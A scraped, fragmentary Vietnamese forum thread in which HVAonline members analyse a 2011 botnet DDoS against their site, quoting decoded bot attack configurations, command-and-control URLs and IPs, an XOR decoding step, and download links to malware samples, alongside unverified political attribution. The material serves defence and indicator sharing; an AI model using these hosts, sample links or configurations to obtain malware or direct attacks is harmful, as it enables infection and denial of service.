Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này? 
Theo tôi rất nhiều members của HVA theo dõi topic này. Nhưng chỉ riêng HVA thôi thì làm sao khống chế được? Thiết nghĩ các thành viên HVA nên public các kết quả đến các forum khác thì hiểu quả sẽ cao hơn. ]]>
/hvaonline/posts/list/39641.html#244370 /hvaonline/posts/list/39641.html#244370 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao wrote:

template wrote:
Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này? 
Theo tôi rất nhiều members của HVA theo dõi topic này. Nhưng chỉ riêng HVA thôi thì làm sao khống chế được? Thiết nghĩ các thành viên HVA nên public các kết quả đến các forum khác thì hiểu quả sẽ cao hơn.  
Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra. Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn. ]]>
/hvaonline/posts/list/39641.html#244373 /hvaonline/posts/list/39641.html#244373 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244374 /hvaonline/posts/list/39641.html#244374 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

template wrote:
Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra. Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn.  
Tôi thấy anh TQN đã post các kết quả RCE ở nhiều forum như DDTH, forum về C hay ở vnzoom, nhưng một cánh én khó làm nên mùa xuân. Bởi vậy tôi mới kêu gọi các thành viên có trách nhiệm public nhiều hơn nữa. Có thể qua YM(spam nhưng là spam tốt:D) qua các forum mà mình tham gia. ]]>
/hvaonline/posts/list/39641.html#244375 /hvaonline/posts/list/39641.html#244375 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244376 /hvaonline/posts/list/39641.html#244376 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244377 /hvaonline/posts/list/39641.html#244377 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Thank you for contacting Sophos Technical Support. **Please note that this is an automated response. If you have any questions, require assistance or clarification on this analysis, please feel free to reply to this email quoting this case number in the subject line.** The file(s) submitted were malicious in nature and detection will be available on the Sophos Databank shortly. AcrobatUpdater.exe -- identity created/updated (New detection Troj/ZerBot-A) jarlib.dll -- clean AcrobatUpdater.exe -- identity created/updated (New detection Troj/ZerBot-A)  ]]> /hvaonline/posts/list/39641.html#244378 /hvaonline/posts/list/39641.html#244378 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao wrote:

template wrote:
Cộng đồng IT biết rất kém về sự kiện lần này, nguyên lớp tôi 200 người, sinh viên năm 4 hầu như không ai biết sự việc đang diễn ra. Các anh một mặt RCE nhưng khâu MARKETTING lại càng quan trọng hơn.  
Tôi thấy anh TQN đã post các kết quả RCE ở nhiều forum như DDTH, forum về C hay ở vnzoom, nhưng một cánh én khó làm nên mùa xuân. Bởi vậy tôi mới kêu gọi các thành viên có trách nhiệm public nhiều hơn nữa. Có thể qua YM(spam nhưng là spam tốt:D) qua các forum mà mình tham gia.  
Mình có theo dõi topic này từ đầu luôn, đã kiểm tra bảng Unikey cty mình trên VirusToTal thấy có Trojan và Malware, nhưng sao em kiểm tra không cỏ 3 ip tĩnh của cty trong danh sách của chú Conmale. Công ty em không cho download file gì hết. Mấy ngày nay, ở cty cũng như ở nhà, em điều vô topic này theo dõi để có thông tin gì thì gửi spam qua yahoo messenger cũng như gửi mail cho mọi người về những cách mà các chú, các anh đã nêu để mọi người biết tìm cách diệt malware bot này. Chắc phải tóm tắt lại nội dung lại rồi để lên facebook và để status YM! quá. Có sư huynh nào giúp tóm tắt nội dung dùm để mọi người đồng loạt loan tin với. Cảm ơn. ]]>
/hvaonline/posts/list/39641.html#244379 /hvaonline/posts/list/39641.html#244379 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244388 /hvaonline/posts/list/39641.html#244388 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244389 /hvaonline/posts/list/39641.html#244389 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244391 /hvaonline/posts/list/39641.html#244391 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244393 /hvaonline/posts/list/39641.html#244393 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244395 /hvaonline/posts/list/39641.html#244395 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Tại sao bolzano_1989 phải đăng ký nick mới tunghoang để post bài chứ ? CMC có áp lực cho em à ? 
http://www.virustotal.com/file-scan/report.html?id=59d4e7d2160a63714a5a9dfe201b7eb4bda81cc13db3c7678e5e58661e1704c8-1311855400 Chắc TQN xem link trên và thấy bolzano_1989 comment phía dưới nên nghĩ như vậy. Tôi là người ngoại đạo, công việc của tôi không liên quan gì đến IT. Tôi và bolzano_1989 là 2 người khác nhau.]]>
/hvaonline/posts/list/39641.html#244396 /hvaonline/posts/list/39641.html#244396 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Hi vọng một mình HVA cũng có thể tiêu diệt mạng botnet lớn nhất Việt Nam hiện nay! ]]> /hvaonline/posts/list/39641.html#244397 /hvaonline/posts/list/39641.html#244397 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/hvaonline/posts/list/210/39641.html#244332" keepCookies="1" crawling="1" referer="Hey Postmodernism, When you config HVA like X-Cafe?"/>
mà tên em dễ viết như thế mà anh TQN lúc thì accxxxx ( chắc đang nghĩ đến từ account ) lúc thì acourxxx :|]]>
/hvaonline/posts/list/39641.html#244398 /hvaonline/posts/list/39641.html#244398 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 wrote:
"Microsoft đã phối hợp với các doanh nghiệp, trường đại học và chính quyền Mỹ thực hiện chiến dịch B107 tiêu diệt Rustock, một trong những mạng botnet lớn và nguy hiểm nhất hành tinh." Hi vọng một mình HVA cũng có thể tiêu diệt mạng botnet lớn nhất Việt Nam hiện nay!  
Muốn làm chiến dịch như vậy thì phải có sự phối hợp giữa "TQN" và "người bị dính chưỡng" và "chính phủ" 1. NGười dính chưỡng cung cấp thông tin lây nhiễm để "TQN" cập nhật thông tin. Yêu cầu tính tự giác . 2. "TQN" viết tool cập nhật liên tục các mẫu. 3. Tiến hành dùng TOOL của "TQN" để quét trên diện rộng hệ thống dính chưỡng. 4. Tiến hành theo dõi diện rộng việc tung chưỡng của sờ tờ lờ. Từ ISP, từ nạn nhân khốn khỗ HVA, từ các nạn nhân có nghi ngờ bị sờ tờ lờ quất khác. 5. Cùng nhau hạ quyền user xuống dưới mức át mi nít chây sần. Và thay đổi tư duy sài account. 6. Liên tục đăng tin khuyến nghị để mọi người biết để tham gia diệt zombies. ... Ý cùn cá nhân.]]>
/hvaonline/posts/list/39641.html#244399 /hvaonline/posts/list/39641.html#244399 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244400 /hvaonline/posts/list/39641.html#244400 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244403 /hvaonline/posts/list/39641.html#244403 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244409 /hvaonline/posts/list/39641.html#244409 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244412 /hvaonline/posts/list/39641.html#244412 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
..................... Debug, trace, capture packet của nó, ra thông tin thằng host mới của STL: Host: second.dinest.net IP: 193.106.175.68 User-Agent: An0nym0453 xv.jpg: 2011-07-28 09:46:58 xc.jpg: <targets><item enabled="1" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/" keepCookies="1" crawling="1" referer=""/></targets> ..................................... PS: Chỉ sơ ý bỏ qua một host trong MsHelpCenter.exe mà tụi nó nhanh chân dùng host kia liền. MsHelpCenter.exe, BackupSvc.exe mang trong người nó 2-4 địa chỉ host để download file exe bot về. Host này down không được thì nhảy tới host khác. Cái này cũng chính là cái chủ quan của em và accxxx89 (thông cảm, tên khó nhớ quá)  
Đây là master webserver mới đang điều khiển cuộc tấn công DDoS vào HVA.Từ 9h sáng đến khoảng 6.30 chiều nay, HVA bị tấn công nặng nề. Sử dung cả 2 đường cáp quang của VNPT và một kết nối 3G, mà tôi không thể nào vao đươc HVA post bài. Sự phát hiện kịp thời các master website đang in-charge (đang làm nhiệm vụ điều khiền mang bot) là một điều rất quan trong, để có biện pháp ứng phó kịp thời. Đúng là webserver có tên miền second.dinest.net cho đến giờ này còn đang điều khiển mạng STL bot. Mang bot đang tập trung tấn công vào HVA. Tuy nhiên khoảng sau 6.30 chiều nay master webserver này thỉnh thoảng có lúc ngừng một thời gian. Webserver second.dinest.net này có một số đăc điểm cần lưu ý: 1-rất it file trong hdocs (bình thường chỉ có 1 file index.html trống rỗng dung lượng chỉ khoảng 1KB và 1,2 file ảnh .jpg. Đây là các file ảnh nhúng vào các lệnh điều khiển mang bot , được mã hoá. Dung lương các file này cũng nhỏ, chỉ vài chục KB.) Nhưng webserver này sử dụng hẳn một IP tĩnh riêng cho nó (193.106.175.168). Trên webserver, như tôi đã viết, chỉ hosting 1 website duy nhất là master website, điều khiển mang bot. Quả thật là nhóm STL lắm tiền nhiều của. STL thường thiết lập các webserver chỉ chứa một website. trong đó cũng rất ít dữ liệu (file), chỉ dùng với mục đích điều khiển mang bot hay thu thập, lấy cắp thông tin cá nhân của người dung thông qua mang bot 2- Webserver second.dinest.net này cài Linux Debian, web server là Apache 2.2.9 (Note: version Apache mới nhất là 2.2.17, như đang cài trên các webserver tôi quản lý). Webserver này chỉ thường xuyên mở 2 cổng là 80 TCP HTTP và công 22 SSH TCP (service SSH-2.0 OPENSSH_5.1p1 Debian-5). Rất khó mới tìm ra được các service tại các cổng. Service SSH thỉ STL dùng để remote control webserver này từ xa (từ xa là từ VN hay TQ chẳng hạn) 3-Có một điều đặc biệt là webserver này mở rất nhiều cổng UDP mà tôi không hiểu lý do từ đâu. Có lúc tôi thấy webserver mở tới 22 cổng UDP (có cả công 53 UDP dùng config. DNS). Tôi chắc là họ chưa có kinh nghiệm trong việc bảo mật webserver và config. nó. Việc này sẽ mang đến những hậu quả không ngờ cho các bác STL. Như thế nào thì không tiện nói, hay không nên nói. 4- Đúng như anh conmale đã viết, webserver này đặt tai Nga (Russian). Vị trí địa lý của nó là ở gần giữa nước Nga, gần Mông cổ hơn cưc bắc Nga và ở phía Đông Bắc tỉnh Krasnoiac. Xin em bản đồ.
Thêm một bằng chứng về sự liên hệ của STL với một số thành phần Nga. Nhưng mối liên hệ này không có gì đáng nói so với một môi liên hệ khác với Nga, mà tôi đã nói ở trên. Tuy nhiên dải IP 193.106.175.0-193.106.175.255 lai có thể do một công ty Pháp sở hữu. Có thể công ty Pháp này đầu tư vào miền trung nước Nga, một vùng còn chậm phát triển. Có thể TQ cũng tham đầu tư liên doanh với Pháp, xây dựng các kết cấu hạ tâng IT tai đây. 5- Domain second.dinest.net là subdomain của domain dinest.net. Nhưng không chỉ có subdomain này, mà còn những subdomain khác. Chúng là:
- fpt.dinest.net IP 67.19.72.202 - irc.dinest.net IP 67.19.72.202 - mail.dinest.net IP 67.19.72.202 - www.dinest.net IP 67.19.72.202 - blog.dinest.net Ip 98.124.253.253 
Các subdomain này có thể là do các chiến hữu của STL quản lý, chính xác hơn là của các cấp lãnh đạo. Dễ dàng nhận thấy subdomain mail.dinest.net là quan trong nhất. Tại đây một mailserver được thiết lâp, dùng cho việc liên hệ trong khối. 6- Webserver second.dinest.net được cấu hình để các kết nối từ trình duyệt của các user-nạn nhân từ các máy zombie của họ đến webserver là các persistent connection (hay còn gọi keep-alive connection). Điều này giup cho các bot trong zombie dễ dàng, nhanh chóng liên hệ với webserver và nhận lệnh lấy cắp thông tin cá nhân, tấn công DDoS các muc tiêu trên mang. Điều này anh conmale cũng đã đề câp trong một post phía trên. 7- Trước webserver second.dinest.net STL còn đặt một server cài phần mềm "NGINX"(đọc là en-din-x), nhằm phòng và hạn chế tác hại của quá trình phản công DDoS vào webserver (second.dinest.net). Biện pháp này vừa qua Vietnamnet.net cũng đã áp dụng khi bị tán công DDoS dồn dâp trên mạng. (Chắc cũng là do STL tấn công thôi. Ở Việt nam, ngoài STL thì không ai có đủ tìền bạc, nhân lực, thời gian và trình độ kiến thức tạo lập được 1 mạng zombies-bot với hàng trăm ngàn máy, đặt trong nước ngoài nước, tấn công DDoS liên tục, năng nề vào Vietnamnet. Lý do Vietnamnet bị STL tấn công là do đây là tờ báo lề phải duy nhất dám chửi, phê phán khá mạnh mẽ hành động, ngang ngược bá quyền của TQ mà thôi. Các báo khác luôn tìm cách né tránh) "NGINX" do một chuyên viên IT người Nga soạn thảo ra. Hiêu quả thưc tế của phần mềm-application này trong việc chống DDoS còn đang đươc bàn cãi. Chưa có công ty Mỹ nào dùng "NGINX" cả. Thưc tế "NGINX" cũng đã gây ra một vài trục trặc trên mang. Tôi cũng đã có một bài viết phân tích cụ thể hơn về "NGINX" tai topic " Sinh tử lênh.......", trong box "Những thảo luận khác" Chúng ta đã nắm đươc các thông tin cần thiết về master webserver second.dinest.net và nhiều webserver khác của STL. Chúng vẫn có những điểm yếu. Chúng ta cần và hoàn toàn có thể phát hiện ra các master webserver của STL sớm, ngay từ khi chúng khởi đông các cuộc tấn công DDoS trên mạng, nhằm phá hủy kết cấu hạ tầng và hoạt đông thông tin mang của cộng đồng, đất nước. Bằng các cách thức từ đơn giản nhất, ai cũng có thể làm, đến các phương thức tinh vi nhất (nhiều hàm lượng trí tuệ), trong một tâp thể HVA đồng tâm hiệp lực vì công đồng, đất nước, chúng ta có thể sẽ bẻ gẫy hay hạn chế tối đa tác hai của các cuộc tấn công DDoS trên mang của STL. Không thể để STL tự tung tự tác, như ở chỗ không người, muốn hạ nhục ai thì hạ, muốn cho website nào ngừng thì phải ngừng. Tôi sẽ gừi anh conmale một số biện pháp cần thiết, mang tính sáng tạo của người VN-"nghèo nhưng không ngu và hèn", để bàn bạc thưc hiện cùng với các bạn.(Không thể bàn công khai trên forum) ]]>
/hvaonline/posts/list/39641.html#244415 /hvaonline/posts/list/39641.html#244415 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. niềm tin và chế độ ấy tốt đẹp đến mức nào khi được một đám người "bảo vệ" bằng những hành động như các bạn đã và đang làm? Tổng kết lại thì các bạn đã làm gì? Các bạn ăn cắp, mạo danh, phá hoại tài sản của người khác, bôi nhọ hết người này đến người khác, phát tán và sử dụng những phương tiện độc hại. Trên mạng, hoạt động của các bạn có đầy đủ các biểu hiện như một nhóm "tin tặc" mũ đen đúng nghĩa, có nghĩa là các bạn cố giấu danh tánh, di chuyển liên tục và sử dụng những dịch vụ nổi tiếng đen tối và độc hại. Các bạn không nhận thấy rằng cả giới IT lẫn không IT đang phỉ nhổ và khinh bỉ các bạn hay sao? Nước Việt Nam và người Việt Nam chưa hề suy đồi đến mức dẫn đến đa số ủng hộ các bạn. Bởi vậy, những việc làm của các bạn chỉ làm tệ hại hơn niềm tin và hình ảnh các bạn đang cố bảo vệ. Về khía cạnh kỹ thuật, các bạn thừa biết rằng từ nay về sau, mỗi khi các bạn tung ra một con malware và bắt đầu phá hoại thì lúc lấy những thành viên ở HVA này sẽ theo sát các bạn. Hãy tự nhìn lại những gì mình làm để sau này, khi nghĩ lại còn thấy có một chút tự hào thay vì xấu hổ và nhục nhã, ngoại trừ trường hợp các bạn cho rằng những việc làm của các bạn là chính nghĩa, đạo đức và ích lợi thì không kể.]]> /hvaonline/posts/list/39641.html#244416 /hvaonline/posts/list/39641.html#244416 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 7/28/2011 3:18:31 AM Pacific Time. Below is the determination for your submission. ======== Submission ID MMPC11072810468966 Submitted Files ============================================= AcrobatUpdater.exe [Worm:Win32/Rebhip.A]  ]]> /hvaonline/posts/list/39641.html#244417 /hvaonline/posts/list/39641.html#244417 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244418 /hvaonline/posts/list/39641.html#244418 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. wrote:
Anh conmale full stress với STl rùi kìa ;)) Bọn nó phá, cũng không thể phá mãi. Càng phá bọn nó càng nhục, nhục rồi đến lúc nội bộ lục cục mà tan rã :)) Vụ này làm cho các thành viên trong HVA mệt mỏi, sau vụ này liệu anh TQN, conmale, PXMMRF, ... có định đi nghỉ mát không các anh ? 
Cũng không có gì mệt mỏi đâu em. Cùng lắm thì HVA bị gián đoạn khi này, khi kia thôi. Chắc member cũng thông cảm vì ai cũng có công việc, trách nhiệm, đời sống riêng nữa :) . HVA cứ đường đường chính chính còn những kẻ phá hoại cứ tiếp tục chui nhủi. Mỗi lần bị động ổ là lại mất server, mất tên miền, tốn kém.... Những trò phá hoại không thấy kết quả gì mà chỉ mang tiếng nhục vào thân. Đến một lúc nào đó, những con người "ảo" lẩn trốn đằng sau những trò phá hoại được "bạch hoá" thì sẽ sống với ai? Ngay lúc này, lại là mấy trò đấm vô /hvaonline/forums/list.html và /hvaonline/portal/list.html và mà không biết mệt. Nghĩ cũng lạ.]]>
/hvaonline/posts/list/39641.html#244428 /hvaonline/posts/list/39641.html#244428 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244431 /hvaonline/posts/list/39641.html#244431 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Thêm nữa, quan trong: Host speed.cyline.org đã được stl ra lệnh sống dạy. Thằng nằm vùng uxtheme.manifest được lệnh down 2 file bmp từ file này. Cách đây thời gian ngắn, em đã post link của nó, nay sinh phép post lại: Code:
URL1: http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca

URL2: http://speed.cyline.org:443/BlueSphere.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf
uxtheme.manifest giải mã flower.bmp cho ra link BlueSphere. Giãi mã tiếp BlueSphere.bmp cho ra 1 exe rỗng. Hôm nay, 29_07_2011, cũng flower.bmp đó, uxtheme.manifest giải mã cho ra: Code:
http://speed.cyline.org:443/plxzyin0fx.bmp
Cái bóng này bự bà cố luôn, giải mã ra 1 exe như Fake Unikey 1, nhưng trong resource lại chưa có gì ? Hết hàng rồi à mấy anh stl ? Hay đang đợi coder code đống "mèo què" khác ! Toàn bộ em up ở đây: 1. FakeUnikey_29_07_2011: http://www.mediafire.com/?k29pqgh8mym4oja 2. AcrobatUpdater_29_07_2011: http://www.mediafire.com/?xzbmds3fob2q39s]]>
/hvaonline/posts/list/39641.html#244434 /hvaonline/posts/list/39641.html#244434 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244443 /hvaonline/posts/list/39641.html#244443 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org)]]>
/hvaonline/posts/list/39641.html#244444 /hvaonline/posts/list/39641.html#244444 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244445 /hvaonline/posts/list/39641.html#244445 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:
Cùng chào đón 1 server mới của STL nào : Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org) 
Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended 
Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection)]]>
/hvaonline/posts/list/39641.html#244452 /hvaonline/posts/list/39641.html#244452 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244453 /hvaonline/posts/list/39641.html#244453 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244455 /hvaonline/posts/list/39641.html#244455 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244456 /hvaonline/posts/list/39641.html#244456 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst wrote:
Bác com ơi , vào site bây giờ vừa khó , vừa lằng nhằng , nhiều khi hiện ra lỗi khó hiểu quá Mong các cao thủ tiếp tục phân tích,tìm cách bem các con virut vừa ddos HVA trong 3 ngày vừa qua  
Đã có thông báo về sự "lằng nhằng" rồi. Hy vọng bồ dành chút thời gian để đọc thông báo. Cám ơn.]]>
/hvaonline/posts/list/39641.html#244457 /hvaonline/posts/list/39641.html#244457 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Tụi stl đã chính thức tắt nguồn ra lệnh tấn công HVA và lên tiếng thương lượng: Chiều nay khi HVA hoạt động trở lại, em tranh thủ check thử cái host second.dinest.net xem nó còn sống không. trong khi mấy cái khác thì closed hàng loạt. Check xong, tính post lên HVA liền, mắc cười muốn bể bụng, nhưng phải đưa "heo sữa" đi xem phim nên giờ mới post. Tối giờ cứ mắc cười hoài;) Dùng Fiddler, em request file xv.jpg từ second.dinest.net, ra kết quả: 2011-07-31 21:55:20. À vậy là còn sống, ra lệnh đám bot AcrobatUpdater.exe config mới đã có ngày hôm qua. Tụi mày lên down về, làm theo lệnh. Em down tiếp xc.jpg, Decode.exe ra, ra dòng thú vị sau trong item targets (chỉ có một mình target là HVA chúng ta thôi): Code:
<targets>
        <item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80"
            rootURI="/"
            uri="/hvaonline/forums/list.html"
            keepCookies="1"
            crawling="1"
            referer="We don't want to did that but Postmodernism forced we! Don't touch us anymore, please!"/>
    </targets>
Hì hì, vậy stl hacker đã set enabled=0 cho HVA chúng ta. Các bạn đọc kỹ dòng referer nhé. Tiếng Anh em thì dốt, nói thì như cọp nhai đậu phộng, đọc thì cứ phang như tiếng Việt, nên em cứ thắc mắc ở chổ: "forced we" ? "forced we" hay "forced us" bà con ! Em nhớ mang máng là "forced us" mới đúng chứ ? Lại mắc cười ở chổ, lúc trước, mấy anh stl hoành hoành bá đạo, đánh phá lung tung, vỗ ngực hênh hoang, coi trời bằng vung, chơi trò "bạch hoá" hèn hạ, làm nhục, bêu xấu hết người này tới người khác, "force" người ta tới đường cùng. Vậy lúc đó mấy anh có nghĩ tới lúc này không, khi mấy anh bị các hắc cơ mũ trắng, không mũ, mất mũ như anh em HVA "phọt" lại, "dầu hắc hoá" mấy anh không ? Bây giờ mấy anh lên tiếng năn nỉ, please nữa à ! Chắc là chỉ tiêu đánh phá, "ổn định chính trị" của mấy anh không đạt, bị xếp dập, phạt, trừ lương phải không mấy anh ? Tội nghiệp ! PS: À, mà mấy anh cũng thâm thật, miệng thì nói "em không muốn" vậy mà "em" cứ phang DDOS hoài hoài, hết đợt này tới đợt khác vậy à. Mấy anh gian xão giống tàu khựa vậy à ?]]>
/hvaonline/posts/list/39641.html#244465 /hvaonline/posts/list/39641.html#244465 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244466 /hvaonline/posts/list/39641.html#244466 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Chúng tôi không muốn làm điều đó nhưng Postmodernism bắt buộc chúng tôi ! Không chạm vào chúng tôi nữa, xin vui lòng!   Nếu hăm doạ thì chúng ta phải tiếp tục thôi, chứ không lẽ vì lời hăm doạ, vì DDOS mà chúng ta phải dừng lại à ! Mấy hôm nay, không vào HVA được, tiếp tục RCE cho xong các đống "mèo què" của stl từ hồi trước tới giờ. Bắt đầu bằng Vecebot, file icon.dat của nó chứa thông tin về DDOS config của tụi nó vào xcafe hồi đó, tương tự như xc.jpg và xv.jpg bây giờ. File icon.dat được mã hoá đơn giản hơn, chỉ bằng xor từng byte trong file với 0x1F. Sau khi xor lại với 0x1F, lòi ra hai host cũ hồi đó của stl: Code:
safebrowser.dyndns.org/photos/safebrowser1.gif
safebrowsing.dyndns-blog.com/photos/safebrowser1.gif
Cũng lại là host trên dyndns.]]>
/hvaonline/posts/list/39641.html#244467 /hvaonline/posts/list/39641.html#244467 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244468 /hvaonline/posts/list/39641.html#244468 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244474 /hvaonline/posts/list/39641.html#244474 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244477 /hvaonline/posts/list/39641.html#244477 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244478 /hvaonline/posts/list/39641.html#244478 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244479 /hvaonline/posts/list/39641.html#244479 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244480 /hvaonline/posts/list/39641.html#244480 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

Symantec wrote:
We have processed your submission (Tracking #20846824) and your submission is now closed. The following is a report of our findings for the files in your submission: File: AcrobatUpdater.exe Machine: Machine Determination: Please see the developer notes.  

Symantec wrote:
--------------------------------------------------------------------------- Developer Notes --------------------------------------------------------------------------- AcrobatUpdater.exe Our automation was unable to identify any malicious content in this submission. The file will be stored for further human analysis 
2. Hàng chục ngàn máy ở Việt Nam, đặc biệt là ở các trường đại học và các tiệm net hoàn toàn không thèm "ke" về chuyện cập nhật antivirus def. Âu cũng là thời u ám cho nên ngay cả trên thế giới ảo cũng u ám.]]>
/hvaonline/posts/list/39641.html#244485 /hvaonline/posts/list/39641.html#244485 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
1. xv.jpg: 2011-08-02 00:27:53: Bắt đầu khuya hôm nay.
2. xc.jpg: <item enabled="1" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" rootURI="/" uri="/hvaonline/forums/list.html" keepCookies="1" crawling="1" referer="/tof/"/>
DDOS hoài không chán à ta ? Anh em bà con suy nghĩ thử có cách nào cho cái second.dinest.net này câm luôn không ? Xin cùng nêu ý kiến ! ]]>
/hvaonline/posts/list/39641.html#244488 /hvaonline/posts/list/39641.html#244488 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244489 /hvaonline/posts/list/39641.html#244489 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244491 /hvaonline/posts/list/39641.html#244491 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
1.  http://safebrowser.dyndns.org/photos/safebrowser1.gif
2.  http://safebrowsing.dyndns-blog.com/photos/safebrowser1.gif
3.  http://express.blogdns.info/advertise.gif
4.  http://fastupdate.dyndns-office.com/advertise.gif
5.  http://hot.enfaqs.com/advertise.gif
6.  http://securelogin.doomdns.com/advertise.gif
7.  http://tongfeirou.dyndns-web.com/banner1.png
8.  http://biouzhen.dyndns-server.com/banner1.png
9.  http://maowoli.dyndns-free.com/banner1.png
10. http://poxxf.com/flash.swf
11. http://paxds.com/flash.swf
12. http://poxxf.com/images.gif
13. http://speed.cyline.org:443/flower.bmp
14. http://speed.cyline.org:443/BlueSphere.bmp
15. http://speed.cyline.org:443/plxzyin0fx.bmp
16. http://second.dinest.net/xc.jpg
17. http://second.dinest.net/xv.jpg
Mong bà con phổ biến, bật firewall để lọc các URL trên và các trình capture để check.]]>
/hvaonline/posts/list/39641.html#244507 /hvaonline/posts/list/39641.html#244507 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF wrote:

rang0 wrote:
Cùng chào đón 1 server mới của STL nào : Code:
http://map.priper.info:8080
Đây sẽ là địa chỉ để file uxtheme.manifest_29072011 connect và cập nhật (có lẽ là để thay thế cho cái speed.cyline.org) 
Domain này (map.priper.info) đã bị suspended
This Account Has Been Suspended 
Domain-website này: "speed.cyline.org", vẫn đang active. Nhưng nhiều lúc kết nôi đến website này rất châm (slow connection) 
Em không biết anh check cái "map.ripper.info" thế nào nhưng hôm nay em vẫn download được malware từ cái host đó : Code:
http://www.mediafire.com/?bdk5fvj8bf8k6nr
]]>
/hvaonline/posts/list/39641.html#244508 /hvaonline/posts/list/39641.html#244508 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244509 /hvaonline/posts/list/39641.html#244509 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244510 /hvaonline/posts/list/39641.html#244510 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
